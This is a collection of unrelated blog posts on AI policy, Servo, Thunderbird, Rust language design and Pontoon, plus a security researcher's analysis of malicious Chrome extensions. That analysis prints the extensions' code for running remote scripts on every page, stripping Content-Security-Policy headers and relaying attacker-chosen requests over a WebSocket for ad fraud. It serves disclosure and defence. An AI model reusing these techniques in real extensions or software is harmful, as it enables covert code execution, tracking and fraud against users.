This Paris Openness workshop discussion — part of the official ‘Road to the Paris AI Summit’ taking place in February 2025 — looked to bring together the European AI community and form actionable recommendations for policymakers. While it embraced healthy debate and disagreement around issues such as definitions of openness in AI, there was nevertheless broad agreement on the urgency of crafting collective ideas to advance openness while navigating an increasingly complex commercial, political and regulatory landscape.

The stakes could not be higher. As AI continues to shape our societies, economies, and governance systems, openness emerges as both an opportunity and a challenge. On one hand, open approaches can expand access to AI tools, foster innovation, and enhance transparency and accountability. On the other hand, they raise complex questions about safety and misuse. In Europe, these questions intersect with transformative regulatory frameworks like the EU AI Act, which seeks to ensure that AI systems are both safe and aligned with fundamental rights.

As in software development, the goal of being ‘open’ in AI is a crucial one. At its heart, openness, we were reminded in the discussion, is a holistic outlook. For AI in particular it is a pathway to getting to a more pluralistic tool – one that can be more transparent, contextual, participatory and culturally appropriate. Each of these goals however contain natural tensions within them.

A central question of this most recent dialogue challenged participants on the best ways to build with safety in mind while also embracing openness. The day was broken down into two workshops that examined these questions from a technical and policy standpoint.

Running through both of the workshops was the thread of a persistent challenge: the multifaceted nature of the term openness. In the policy context, the term “open-source” can be too narrow, and at times, it risks being seen as an ideological stance rather than a pragmatic tool for addressing specific issues. To address this, many participants felt openness should be framed as a set of components — including open models, data, and tools — each of which has specific benefits and risks.

Examining Technical Perspectives on Openness and Safety

A significant concern for many in the open-source community is getting access to the best existing safety tools. Despite the increasing importance of AI safety, many researchers can find it difficult or expensive to access tools to help identify and address AI risks. In particular the discussion surfaced an increasing tension between some researchers and startups who have found it difficult to access datasets of known CSAM (Child Sexual Abuse Material) hashtags. Accessing these data sets could help mitigate misuse or clean training datasets. The workshop called for broader sharing of safety tools and more support for those working at the cutting edge of AI development.

More widely, some participants were frustrated by perceptions that open source AI development is not bothered by questions of safety. They pointed out that, especially when it comes to regulation, focusing on questions of safety makes them even more competitive.

Discussing Policy Implications of Openness in AI

Policy discussions during the workshop focused on the economic, societal, and regulatory dimensions of openness in AI. These ranged over several themes, including:

  1. Challenging perceptions of openness: There is a clear need to change the narrative around openness, especially in policymaking circles. The open-source community must both act as a community and present itself as knowledgeable and solution-oriented, demonstrating how openness can be a means to advancing the public interest — not an abstract ideal. As one participant pointed out, openness should be viewed as a tool for societal benefit, not as an end in itself.
  2. Tensions between regulation and innovation are misleading: As one of the first regulatory frameworks on AI to be drafted, many people view the EU’s AI Act as a test bed to get to smarter AI regulation. While there is a widespread characterisation of regulation obstructing innovation, some participants highlighted that this can be misleading — many new entrants seek out jurisdictions with favourable regulatory and competition policies that level the playing field.
  3. A changing U.S. Perspective: In the United States, the open-source AI agenda has gained significant traction, particularly in the wake of incidents like the Llama leaks, which showed that many of the feared risks associated with openness did not materialize. Significantly, the U.S. National Telecommunications and Information Administration emphasized the benefits of open source AI technology and introduced a nuanced view of safety concerns around open-weight AI models.

Many participants also agreed that policymakers, many of whom are not deeply immersed in the technicalities of AI, need a clearer framework for understanding the value of openness. Considering the focus of the upcoming Paris AI Summit, some participants felt one solution could lie in focusing on public interest AI. This concept resonates more directly with broader societal goals while still acknowledging the risks and challenges that openness brings.

Recommendations 

Embracing openness in AI is non-negotiable if we are to build trust and safety; it fosters transparency, accountability, and inclusive collaboration. Openness must extend beyond software to broader access to the full AI stack, including data and infrastructure, with a governance that safeguards public interest and prevents monopolization.

It is clear that the open source community must make its voice louder. If AI is to advance competition, innovation, language, research, culture and creativity for the global majority of people, then an evidence-based approach to the benefits of openness, particularly when it comes to proven economic benefits, is essential for driving this agenda forward.

Several recommendations for policymakers also emerged.

  1. Diversify AI Development: Policymakers should seek to diversify the AI ecosystem, ensuring that it is not dominated by a few large corporations in order to foster more equitable access to AI technologies and reduce monopolistic control. This should be approached holistically, looking at everything from procurement to compute strategies.
  2. Support Infrastructure and Data Accessibility: There is an urgent need to invest in AI infrastructure, including access to data and compute power, in a way that does not exacerbate existing inequalities. Policymakers should prioritize distribution of resources to ensure that smaller actors, especially those outside major tech hubs, are not locked out of AI development.
  3. Understand openness as central to achieving AI that serves the public interest. One of the official tracks of the upcoming Paris AI Action Summit is Public Interest AI. Increasingly, openness should be deployed as a main route to truly publicly interested AI.
  4. Openness should be an explicit EU policy goal: As one of the furthest along in AI regulatory frameworks the EU will continue to be a testbed for many of the big questions in AI policy. The EU should adopt an explicit focus on promoting openness in AI as a policy goal.

We will be raising all the issues discussed while at the AI Action Summit in Paris. The organizers hope to host another set of these discussions following the conclusion of the Summit in order to continue working with the community and to better inform governments and other stakeholders around the world.

The list of participants at the Paris Openness Workshop is below:

  • Linda Griffin – VP of Global Policy, Mozilla
  • Udbhav Tiwari – Director, Global Product Policy, Mozilla
  • Camille François – Researcher, Columbia University
  • Tanya Perelmuter – Co-founder and Director of Strategy,, Fondation Abeona
  • Yann Lechelle – CEO, Probabl
  • Yann Guthmann – Head of Digital Economy, Department at the French Competition Authority
  • Adrien Basdevant – Tech lawyer, Entropy Law
  • Andrzej Neugebauer – AI Program Director, LINAGORA
  • Thierry Poibeau – Director of Research, CNRS, ENS
  • Nik Marda – Technical Lead for AI Governance, Mozilla
  • Andrew Strait – Associate Director, Ada Lovelace Institute (UK)
  • Paul Keller – Director of Policy, Open Future (Netherlands)
  • Guillermo Hernandez – AI Policy Analyst, OECD
  • Sandrine Elmi Hersi – Unit Chief of “Open Internet”, ARCEP

The post Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop appeared first on Open Policy & Advocacy.

Wladimir PalantAnalysis of an advanced malicious Chrome extension

Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.

However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.

Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.

Screenshot of an extension pop-up. The text in the popup says “Seamlessly integrate the renowned Internet Download Manager (IDM) with Google Chrome, all without the need for dubious third-party extensions” followed up with some instructions.

The problematic extensions

Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.

Name Weekly active users Extension ID Featured
Freemybrowser 10,000 bibmocmlcdhadgblaekimealfcnafgfn
AutoHD for Twitch™ 195 didbenpmfaidkhohcliedfmgbepkakam
Free simple Adult Blocker with password 1,000 fgfoepffhjiinifbddlalpiamnfkdnim
Convert PDF to JPEG/PNG 20,000 fkbmahbmakfabmbbjepgldgodbphahgc
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Auto Resolution Quality for YouTube™ 223 hdangknebhddccoocjodjkbgbbedeaam
Adblock.mx - Adblock for Chrome 1,000 hmaeodbfmgikoddffcfoedogkkiifhfe
Auto Quality for YouTube™ 100,000 iaddfgegjgjelgkanamleadckkpnjpjc
Anti phising safer browsing for chrome 7,000 jkokgpghakemlglpcdajghjjgliaamgc
Darktheme for google translate 40,000 nmcamjpjiefpjagnjmkedchjkmedadhc

Additional IOCs:

  • adblock[.]mx
  • adultblocker[.]org
  • autohd[.]org
  • autoresolutionquality[.]com
  • browserguard[.]net
  • freemybrowser[.]com
  • freepdfconversion[.]com
  • internetdownloadmanager[.]top
  • megaxt[.]com
  • darkmode[.]site

“Remote configuration” functionality

The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and declarativeNetRequest permission. Apparently, nobody noticed this inconsistency so far.

Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:

async function u(l) {
  await chrome.storage.local.set({ checklist: l });

  await chrome.declarativeNetRequest.updateDynamicRules({
    addRules: l.list.add,
    removeRuleIds: l.list.rm,
  });
}

This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:

function f() {
  let doc = document.documentElement;
  function updateHelpInfo(info, k) {
    doc.setAttribute(k, info);
    doc.dispatchEvent(new CustomEvent(k.substring(2)));
    doc.removeAttribute(k);
  }

  document.addEventListener(
    "description",
    async ({ detail }) => {
      const response = await chrome.runtime.sendMessage(
        detail.msg,
      );
      document.dispatchEvent(
        new CustomEvent(detail.responseEvent, {
          detail: response,
        }),
      );
    },
  );

  chrome.storage.local.get("checklist").then(
    ({ checklist }) => {
      if (checklist && checklist.info && checklist.core) {
        updateHelpInfo(checklist.info, checklist.core);
      }
    },
  );
}

There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via tabs.executeScript API.

This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.

The code being executed

When the extension downloads its “checklist” immediately after installation the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so it will respond with the real thing. For example, the list key of the response looks like this then:

"add": [
  {
    "action": {
      "responseHeaders": [
        {
          "header": "Content-Security-Policy-Report-Only",
          "operation": "remove"
        },
        {
          "header": "Content-Security-Policy",
          "operation": "remove"
        }
      ],
      "type": "modifyHeaders"
    },
    "condition": {
      "resourceTypes": [
        "main_frame"
      ],
      "urlFilter": "*"
    },
    "id": 98765432,
    "priority": 1
  }
],
"rm": [
  98765432
]

No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.

As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.

Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:

  1. Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above, this function forwards the messages to the extension’s background worker and the worker then calls the respective APIs.

    In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.

    There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means however that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue.

  2. Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated.

    With Bloom filters, it is impossible to determine which exact data went into it. It is possible however to try out guesses, to see which one it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise has been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.

  3. The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.

    The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.

The “session” handling

Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:

var __create = url => {
  const socket = new this.WebSocket(url);
  const buffer = {};
  socket.onmessage = event => {
    let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
    this.stepModifiedMatcher(socket, buffer, message)
  };
};

stepModifiedMatcher =
  async (socket, buffer, message) => {
    if (message.arrayBuffer)
      buffer[1] = message.arrayBuffer();
    else {
      let [url, options] = message;
      if (buffer[1]) {
        options.body = await buffer[1];
        buffer[1] = null;
      }

      let response = await this.fetch(url, options);
      let data = await Promise.all([
        !message[3] ? response.arrayBuffer() : false,
        JSON.stringify([...response.headers.entries()]),
        response.status,
        response.url,
        response.redirected,
      ]);
      for (const entry of data) {
        if (socket.readyState === 1) {
          socket.send(entry);
        }
      }
    }
  };

This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.

What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPay account.

The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).

Developer Tools screenshot, listing a number of network requests. It starts with ashleymadison.com and loads a number of JavaScript and CSS files as well as images. All requests are listed as fetch requests initiated by background.js:361.

The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.

I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.

Who is behind these extensions?

The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.

While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension also geared towards running remote code) but also a real owner with a real name. Who just happens to be a developer at adindex.

There is also the company eokoko GmbH, developing Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. Director of this company is once again the same adindex developer.

And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.

When I mentioned this connection in my communication with adindex CEO the response was:

[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.

I want to conclude this article with some assorted history facts:

  • The two extensions associated with MegaXT have been running remote code since at least 2021. I don’t know whether they were outright malicious from the start, this would be impossible to prove retroactively even with source code given that they simply loaded some JavaScript code into the extension context. But both extensions have reviews complaining about malicious functionality going back to 2022.
  • Darktheme for google translate and Download Manager Integration Checklist extensions both appear to have changed hands in 2024, after which they requested more privileges with an update in October 2024.
  • Download Manager Integration Checklist extension used to be called “IDM Integration Module” in 2022. There have been at least five more extensions with similar names (not counting the official one), all removed from Chrome Web Store due to “policy violation.” This particular extension was associated with a website which is still offering “cracks” that show up as malware on antivirus scans (the installation instructions “solve” this by recommending to turn off antivirus protection). But that’s most likely the previous extension owner.
  • Convert PDF to JPEG/PNG appears to have gone through a hidden ownership change in 2024, after which an update in September 2024 requested vastly extended privileges. However, the extension has reviews complaining about spammy behavior going back to 2019.

Mozilla Performance BlogPerformance Testing Newsletter (Q4 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products. See below for highlights from the changes made in the last quarter.

This quarter also saw the release of perf.compare! It’s a new tool used for making comparisons between try runs (or other pushes). It is now the default comparison tool used for these comparisons and replaces the Compare View that was in use previously. Congratulations to all the folks involved in making this release happen! Feel free to reach out in #perfcompare on Matrix if there are any questions, feature requests, etc.. Bugs can be filed in Testing :: PerfCompare.

Highlights from Contributors

PerfCompare

Profiler

Perftest

Highlights from Rest of the Team

Blog Posts ✍️

Contributors

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Servo BlogServo in 2024: stats, features and donations

Two years after the renewed activity on the project we can confirm that Servo is fully back.

If we ignore the bots, in 2024 we’ve had 129 unique contributors (+143% over 54 last year), landing 1,771 pull requests (+163% over 673), and that’s just in our main repo!

Including bots, the total number of PRs merged goes up to 2,674 (+144% over 1094). From all this work, 26% of the PRs were made by Igalia, 40% by other contributors and the rest by the bots (34%). This shows how the Servo community has been growing and becoming more diverse with new actors participating actively in the project.

2018 2019 2020 2021 2022 2023 2024
Merged PRs 1,188 986 669 118 65 776 1,771
Unique contributors 142 141 87 37 20 54 129
Average unique contributors per month 27.33 27.17 14.75 4.92 2.83 11.33 26.33

Now let’s take a look to the data and chart above, which show the evolution since 2018 in number of merged PRs, unique contributors per year and average contributors per month (excluding bots). We can see the project is back to numbers of 2018 and 2019 when it was been developed in full speed!

It’s worth noting that Servo popularity keeps growing, with many folks realizing there has been new activity on the project last year, and we have more and more people interested in the project.

Servo GitHub start history chart showing Servo not stopping going up since 2013, up to more than 25,000 today <figcaption>Servo GitHub stars haven't stopped growing, surpassing now 25K threshold.</figcaption>

During 2024 Servo has been present in 8 events with 9 talks: FOSDEM, Open Source Summit North America, Seattle Rust user meetup, GOSIM Europe, Global Software Technology Summit, Linux Foundation Europe Member Summit, GOSIM China, Ubuntu Summit.

If we focus on development there has been many things moving forward during the year. Servo main dependencies (SpiderMonkey, Stylo and WebRender) have been upgraded, the new layout engine has kept evolving adding support for floats, tables, flexbox, fonts, etc. By the end of 2024 Servo passes 1,515,229 WPT subtests (79%). Many other new features have been under active development: WebGPU, Shadow DOM, ReadableStream, WebXR, … Servo now supports two new platforms: Android and OpenHarmony. And we have got the first experiments of applications using Servo as a web engine (like Tauri, Blitz, QtWebView, Cuervo, Verso and Moto).

In 2024 we have raised 33,632.64 USD with donations via Open Collective and GitHub Sponsors from 500 different people and organizations. Thank you all for supporting us!

With this money we have now 3 servers that provides self-hosted runners for Linux, macOS, and Windows reducing our build times from over an hour to under 30 minutes.

Talking about the future, the Servo TSC has been discussing the roadmap for 2025 which has been updated on the Servo’s wiki. We have many plans to keep Servo thriving with new features and improvements. Let’s hope for a great 2025!

Mozilla ThunderbirdVIDEO: The Thunderbird Mobile Team

The Thunderbird Mobile team are crafting the newest chapter of the Thunderbird story. In this month’s office hours, we sat down to chat with the entire mobile team! This includes Philipp Kewisch, Sr. Manager of Mobile Engineering (and long-time Thunderbird contributor), and Sr. Software Engineers cketti and Wolf Montwé (long-time K-9 Mail maintainer and developer, respectively). We talk about the journey from K-9 Mail to Thunderbird for Android, what’s new and what’s coming in the near future, and the first steps towards Thunderbird on your iOS devices!

Next month, we’ll be chatting with Laurel Terlesky, Manager of the UI/UX Design Studio! She’ll be sharing her FOSDEM talk, “Thunderbird: Building a Cross-Platform, Scalable Open-Source Design System.” It’s been a while since we’ve chatted with the design team, and it will be great to see what they’re working on.

January Office Hours: The Thunderbird Mobile Team

In June 2022, we announced that K-9 Mail would be joining the Thunderbird family, and would ultimately become Thunderbird for Android. After two years of development, the first beta release of Thunderbird for Android debuted in October 2024, shortly followed by the first stable release. Since then, over 200 thousand users have downloaded the app, and we’ve gotten some very nice reviews in ZDNet and Android Authority. If you haven’t tried us on your Android device yet, now is a great time! And if, like some of us, you’re waiting for Thunderbird to come to your iPhone or iPad, we have some exciting news at the end of our talk.

Want to know more about the Android development process and find out what’s coming soon to the app? Want the first look into our plans for Thunderbird on iOS? Let our mobile team guests provide the answers!

Watch, Read, and Get Involved

We’re so grateful to Philipp, cketti, and Wolf for joining us! We hope this video helps explain more about Thunderbird on Android (and eventually iOS), and encourages you to download the app if you haven’t already. If you’re a regular user, we hope you consider contributing code, translations, or support. And if you’re an iOS developer, we hope you consider joining our team!

VIDEO (Also on Peertube):

Thunderbird for Android Resources:

The post VIDEO: The Thunderbird Mobile Team appeared first on The Thunderbird Blog.

Niko MatsakisPreview crates

This post lays out the idea of preview crates.1 Preview crates would be special crates released by the rust-lang org. Like the standard library, preview crates would have access to compiler internals but would still be usable from stable Rust. They would be used in cases where we know we want to give users the ability to do X but we don’t yet know precisely how we want to expose it in the language or stdlib. In git terms, preview crates would let us stabilize the plumbing while retaining the ability to iterate on the final shape of the porcelain.

Nightly is not enough

Developing large language features is a tricky business. Because everything builds on the language, stability is very important, but at the same time, there are some questions that are very hard to answer without experience. Our main tool for getting this experience has been the nightly toolchain, which lets us develop, iterate, and test features before committing to them.

Because the nightly toolchain comes with no guarantees at all, however, most users who experiment with it do so lightly, just using it for toy projects and the like. For some features, this is perfectly fine, particularly syntactic features like let-else, where you can learn everything you need to know about how it feels from a single crate.

Nightly doesn’t let you build a fledgling ecosystem

Where nightly really fails us though is the ability to estimate the impact of a feature on a larger ecosystem. Sometimes you would like to expose a capability and see what people build with it. How do they use it? What patterns emerge? Often, we can predict those patterns in advance, but sometimes there are surprises, and we find that what we thought would be the default mode of operation is actually kind of a niche case.

For these cases, it would be cool if there were a way to issue a feature in “preview” mode, where people can build on it, but it is not yet released in its final form. The challenge is that if we want people to use this to build up an ecosystem, we don’t want to disturb all those crates when we iterate on the feature. We want a way to make changes that lets those crates keep working until the maintainers have time to port to the latest syntax, naming, or whatever.

Editions are closer, but not quite right

The other tool we have for correct mistakes is editions. Editions let us change what syntax means and, because they are opt-in, all existing code continues to work.

Editions let us fix a great many things to make Rust more self-consistent, but they carry a heavy cost. They force people to relearn how things in Rust work. The make books oudated. This price is typically too high for us to ship a feature knowing that we are going to change it in a future edition.

Let’s give an example

To make this concrete, let’s take a specific example. The const generics team has been hard at work iterating on the meaning of const trait and in fact there is a pending RFC that describes their work. There’s just one problem: it’s not yet clear how it should be exposed to users. I won’t go into the rationale for each choice, but suffice to say that there are a number of options under current consideration. All of these examples have been proposed, for example, as the way to say “a function that can be executed at compilation time which will call T::default”:

  • const fn compute_value<T: ~const Default>()
  • const fn compute_value<T: const Default>()
  • const fn compute_value<T: Default>()

At the moment, I personally have a preference between these (I’ll let you guess), but I figure I have about… hmm… 80-90% confidence in that choice. And what’s worse, to really decide between them, I think we have to see how the work on async proceeds, and perhaps also what kinds of patterns turn out to be common in practice for const fn. This stuff is difficult to gauge accurately in advance.

Enter preview crates

So what if we released a crate rust_lang::const_preview. In my dream world, this is released on crates.io, using the namespaces described in [RFC #3243][https://rust-lang.github.io/rfcs/3243-packages-as-optional-namespaces.html]. Like any crate, const_preview can be versioned. It would expose exactly one item, a macro const_item that can be used to write const functions that have const trait bounds:

const_preview::const_item! {
    const fn compute_value<T: ~const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Interally, this const_item! macro can make use of internal APIs in the compiler to parse the contents and deploy the special semantics.

Releasing v2.0

Now, maybe we use this for a while, and we find that people really don’t like the ~, so we decide to change the syntax. Perhaps we opt to write const Default instead of ~const Default. No problem, we release a 2.0 version of the crate and we also rewrite 1.0 to take in the tokens and invoke 2.0 using the semver trick.

const_preview::const_item! {
    const fn compute_value<T: const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Integrating into the language

Once we decide we are happy with const_item! we can merge it into the language proper. The preview crates are deprecated and simply desugar to the true language syntax. We all go home, drink non-fat flat whites, and pat ourselves on the back.

User-based experimentation

One thing I like about the preview crates is that then others can begin to do their own experiments. Perhaps somebody wants to try out what it would be like it T: Default meant const by default–they can readily write a wrapper that desugars to const_preview::const_item and try it out. And people can build on it. And all that code keeps working once we integrate const functions into the language “for real”, it just looks kinda dated.

Frequently asked questions

Why else might we use previews?

Even if we know the semantics, we could use previews to stabilize features where the user experience is not great. I’m thinking of Generic Associated Types as one example, where the stabilization was slowed because of usability concerns.

What are the risks from this?

The previous answers hints at one of my fears… if preview crates become a widespread way for us to stabilize features with usability gaps, we may accumulate a very large number of them and then never move those features into Rust proper. That seems bad.

Shouldn’t we just make a decision already?

I mean…maybe? I do think we are sometimes very cautious. I would like us to get better at leaning on our judgment. But I also seem that sometimes there is a tension between “getting something out the door” and “taking the time to evaluate a generalization”, and it’s not clear to me that this tension is an inherent complexity or an artificial artifact of the way we do business.

But would this actually work? What’s in that crate and what if it is not matched with the right version of the compiler?

One very special thing about libstd is that it is released together with the compiler and hence it is able to co-evolve, making use of internal APIs that are unstable and change from release to release. If we want to put this crate on crates.io, it will not be able to co-evolve in the same way. Bah. That’s annoying! But I figure we still handle it by actually having the preview functionality exposed by crates in sysroot that are shipping along the compiler. These crates would not be directly usable except by our blessed crates.io crates, but they would basically just be shims that expose the underlying stuff. We could of course cut out the middleman and just have people use those preview crates directly– but I don’t like that as much because it’s less obvious and because we can’t as easily track reverse dependencies on crates.io to evaluate usage.

A macro seems heavy weight! What other options have you considered?

I also considered the idea of having p# keywords (“preview”), so e.g.

#[allow(preview_feature)]
p#const fn compute_value<T: p#const Default>() {
    // works on stable
}

Using a p# keyword would fire off a lint (preview_feature) that you would probably want to allow.

This is less intrusive, but I like the crate idea better because it allows us to release a v2.0 of the p#const keyword.

What kinds of things can we use preview crates for?

Good question. I’m not entirely sure. It seems like APIs that require us to define new traits and other things would be a bit tricky to maintain the total interoperability I think we want. Tools like trait aliases etc (which we need for other reasons) would help.

Who else does this sort of thing?

Ember has formalized this “plumbing first” approach in their version of editions. In Ember, from what I understand, an edition is not a “time-based thing”, like in Rust. Instead, it indicates a big shift in paradigms, and it comes out when that new paradigm is ready. But part of the process to reaching an edition is to start by shipping core APIs (plumbing APIs) that create the new capabilities. The community can then create wrappers and experiment with the “porcelain” before the Ember crate enshrines a best practice set of APIs and declares the new Edition ready.

Java has a notion of preview features, but they are not semver guaranteed to stick around.

I’m not sure who else!

Could we use decorators instead?

Usability of decorators like #p[const_preview::const_item] is better, particularly in rust-analyzer. The tricky bit there is that decorates can only be applied to valid Rust syntax, so it implies we’d need to extend the parser to include things like ~const forever, whereas I might prefer to have that complexity isolated to the const_preview crate.

So is this a done deal? Is this happening?

I don’t know! People often think that because I write a blog post about something it will happen, but this is currently just in “early ideation” stage. As I’ve written before, though, I continue to feel that we need something kind of “middle state” for our release process (see e.g. this blog post, Stability without stressing the !@#! out), and I think preview crates could be a good tool to have in our toolbox.


  1. Hat tip to Yehuda Katz and the Ember community, Tyler Mandry, Jack Huey, Josh Triplett, Oli Scherer, and probably a few others I’ve forgotten with whom I discussed this idea. Of course anything you like, they came up with, everything you hate was my addition. ↩︎

Mozilla Localization (L10N)2025 Pontoon survey results

The results from the 2025 Pontoon survey are in and the 3 top-voted features we commit to implement are:

  1. Add ability to preview Fluent strings in the editor (258 votes).
  2. Keep unsaved translations when navigating to other strings (252 votes).
  3. Hint at any available variants when referencing message (229 votes).

The remaining features ranked as follows:

  1. Add virtual keyboard with special characters to the editor (226 votes).
  2. Link project names in Concordance search results to corresponding strings (223 votes).
  3. Add a batch action to pretranslate a selection of strings (218 votes).
  4. Add ability to edit and remove comments (216 votes).
  5. Enable use of generic machine translation engines with pretranslation (209 votes).
  6. Add ability to report comments and suggestions for abusive content (193 votes).
  7. Add “Copy translation from another locale as suggestion” batch action (186 votes).

We thank everyone who dedicated their time to share valuable responses and suggest potential features for us to consider implementing!

Each user could give each feature 1 to 5 votes. A total of 154 Pontoon users participated in the survey, 68 of which voted on all features. The number of participants is lower than in the past years, since we only reached out to users who explicitly opted-in to email updates.

We look forward to implementing these new features and working towards a more seamless and efficient translation experience with Pontoon. Stay tuned for updates!

Don Martitime to sharpen your pencils, people

Mariana Olaizola Rosenblat covers How Meta Turned Its Back on Human Rights for Tech Policy Press. Zuckerberg announced that his company will no longer work to detect abuses of its platforms other than high-severity violations of content policy, such as those involving illicit drugs, terrorism, and child sexual exploitation. The clear implication is that the company will no longer strive to police its platform against other harmful content, including hate speech and targeted harassment.

Sounds like a brand-unsafe environment. So is another rush of advertiser boycott stories coming? Not this time. Lara O’Reilly reports that brand safety has recently become a political hot potato and been a flash point for some influential, right-leaning figures. In uncertain times, marketing decision-makers are keeping a low profile. Most companies aren’t really set up to take on the open-ended security risk of coming out against hate speech by users with friends in high places. According to the Fraternal Order of Police, the January 6 pardons send a dangerous message, and that message is being heard in marketing departments. The CMOs who boycotted last time are fully aware that stochastic terrorism is a thing, and that rage stories about companies spread quickly in Facebook groups and other extremist media. If an executive makes the news for pulling ads from Meta, they would be putting employees at risk from lone, deniable attacks. So instead of announcing a high-profile boycott, marketers are more likely to follow the example of Federal employees and do the right thing, by the book, and quietly.

Fortunately, big advertisers got some lower-stakes practice with the X (former Twitter) situation. Instead of either (1) staying on there and putting the brand at risk of being associated with material copied out of Henry Ford’s old newspaper or (2) risking getting snarled up in a lawsuit for pulling the X ads entirely, brands got the best of both by cutting way back on the actual money without dropping X entirely or saying much one way or the other.

